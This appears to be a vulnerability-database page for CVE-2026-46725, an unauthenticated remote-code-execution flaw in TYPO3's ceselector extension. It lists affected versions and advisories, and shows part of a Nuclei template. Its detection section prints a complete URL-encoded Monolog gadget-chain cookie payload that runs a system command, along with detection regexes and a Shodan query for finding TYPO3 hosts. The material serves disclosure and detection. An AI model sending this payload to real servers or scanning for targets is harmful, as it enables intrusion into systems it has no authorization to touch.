CVE-2026-46725
published 2026-05-19CVE-2026-46725: The extension passes an attacker-controlled cookie directly to PHP's unserialize() without safely processing the input. A remote, unauthenticated attacker can…
PriorityP272critical9.2CVSS 4.0
AVNACLATPPRNUINVCHVIHVAHSCNSINSANEXCRXIRXARXMAVXMACXMATXMPRXMUIXMVCXMVIXMVAXMSCXMSIXMSAXSXAUXRXVXREXUX
EXPLOIT
EPSS
2.31%
81.2th percentile
The extension passes an attacker-controlled cookie directly to PHP's unserialize() without safely processing the input. A remote, unauthenticated attacker can supply a crafted serialized payload to trigger PHP Object Injection, leading to Remote Code Execution on the TYPO3 server. Exploitation requires the content element to be configured with "Persistent Mode: Static" in the plugin settings.
Affected
8 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mmc | ceselector | >= 0 < 3.0.3 | 3.0.3 |
| mmc | ceselector | >= 4.0.0 < 4.0.2 | 4.0.2 |
| mmc | ceselector | >= 5.0.0 < 5.0.1 | 5.0.1 |
| mmc | ceselector | >= 6.0.0 < 6.0.1 | 6.0.1 |
| typo3 | extension_content_element_selector | < 3.0.3 | 3.0.3 |
| typo3 | extension_content_element_selector | >= 4.0.0 < 4.0.2 | 4.0.2 |
| typo3 | extension_content_element_selector | >= 5.0.0 < 5.0.1 | 5.0.1 |
| typo3 | extension_content_element_selector | >= 6.0.0 < 6.0.1 | 6.0.1 |
Detection & IOCsextracted from sources · hover to see the quote
bytes
O%3A28%3A%22Monolog%5CHandler%5CGroupHandler%22%3A1%3A%7Bs%3A11%3A%22%00%2A%00handlers%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A29%3A%22Monolog%5CHandler%5CBufferHandler%22%3A6%3A%7Bs%3A10%3A%22%00%2A%00handler%22%3Br%3A3%3Bs%3A13%3A%22%00%2A%00bufferSize%22%3Bi%3A1%3Bs%3A14%3A%22%00%2A%00bufferLimit%22%3Bi%3A0%3Bs%3A9%3A%22%00%2A%00buffer%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A17%3A%22Monolog%5CLogRecord%22%3A2%3A%7Bs%3A5%3A%22level%22%3BE%3A19%3A%22Monolog%5CLevel%3ADebug%22%3Bs%3A5%3A%22mixed%22%3Bs%3A2%3A%22id%22%3B%7D%7Ds%3A14%3A%22%00%2A%00initialized%22%3Bb%3A1%3Bs%3A13%3A%22%00%2A%00processors%22%3Ba%3A3%3A%7Bi%3A0%3Bs%3A15%3A%22get_object_vars%22%3Bi%3A1%3Bs%3A3%3A%22end%22%3Bi%3A2%3Bs%3A6%3A%22system%22%3B%7D%7D%7D%7D
- →Detect exploitation attempts by inspecting HTTP requests for a cookie name matching the pattern T3_ceselector_<digits> containing a URL-encoded PHP serialized object payload (starting with O%3A or O:) ↗
- →The exploit uses a Monolog gadget chain (GroupHandler → BufferHandler → LogRecord) with 'system' as a processor to achieve RCE; detect presence of 'Monolog%5CHandler%5CGroupHandler' or 'Monolog\Handler\GroupHandler' in cookie values on TYPO3 endpoints ↗
- →Successful exploitation produces Unix id command output in the HTTP response body; monitor for responses matching uid=\d+\([a-zA-Z0-9_-]+\)\s+gid=\d+\([a-zA-Z0-9_-]+\) on TYPO3 servers
- →Exploitation is only possible when the ceselector content element is configured with 'Persistent Mode: Static'; focus detection on TYPO3 instances with this plugin configuration ↗
- →Use Shodan query http.component:"TYPO3 CMS" to identify potentially vulnerable internet-facing TYPO3 instances for proactive scanning
- ·Exploitation requires the vulnerable TYPO3 ceselector content element to be explicitly configured with 'Persistent Mode: Static'; instances without this configuration are not exploitable via this vector ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-8x3j-439w-537c: The extension passes an attacker-controlled cookie directly to PHP's unserialize() without safely processing the input
ghsa_unreviewed·2026-05-19
CVE-2026-46725 [CRITICAL] CWE-502 GHSA-8x3j-439w-537c: The extension passes an attacker-controlled cookie directly to PHP's unserialize() without safely processing the input
The extension passes an attacker-controlled cookie directly to PHP's unserialize() without safely processing the input. A remote, unauthenticated attacker can supply a crafted serialized payload to trigger PHP Object Injection, leading to Remote Code Execution on the TYPO3 server. Exploitation requires the content element to be configured with "Persistent Mode: Static" in the plugin settings.
GHSA
TYPO3 Remote Code Execution in extension "Content Element Selector" (ceselector)
ghsa·2026-05-19
CVE-2026-46725 [CRITICAL] CWE-502 TYPO3 Remote Code Execution in extension "Content Element Selector" (ceselector)
TYPO3 Remote Code Execution in extension "Content Element Selector" (ceselector)
The TYPO3 "Content Element Selector" (ceselector) extension passes an attacker-controlled cookie directly to PHP's `unserialize()` without safely processing the input. A remote, unauthenticated attacker can supply a crafted serialized payload to trigger PHP Object Injection, leading to Remote Code Execution on the TYPO3 server. Exploitation requires the content element to be configured with `Persistent Mode: Static` in the plugin settings. This has been patched in version 3.0.3, 4.0.2, 5.0.1, and 6.0.1.
No detection rules found.
Nuclei
TYPO3 ceselector Extension - Insecure Deserialization
nuclei·CVSS 9.2
CVE-2026-46725 [CRITICAL] TYPO3 ceselector Extension - Insecure Deserialization
TYPO3 ceselector Extension - Insecure Deserialization
TYPO3 extension contains a PHP Object Injection caused by passing attacker-controlled cookie to unserialize() without validation, letting remote unauthenticated attackers achieve remote code execution, exploit requires Persistent Mode: Static configuration.
Template:
id: CVE-2026-46725
info:
name: TYPO3 ceselector Extension - Insecure Deserialization
author: DhiyaneshDk
severity: critical
description: |
TYPO3 extension contains a PHP Object Injection caused by passing attacker-controlled cookie to unserialize() without validation, letting remote unauthenticated attackers achieve remote code execution, exploit requires Persistent Mode: Static configuration.
impact: |
Remote unauthenticated attackers can execute arbitrary code on the
No writeups or analysis indexed.
2026-05-19
Published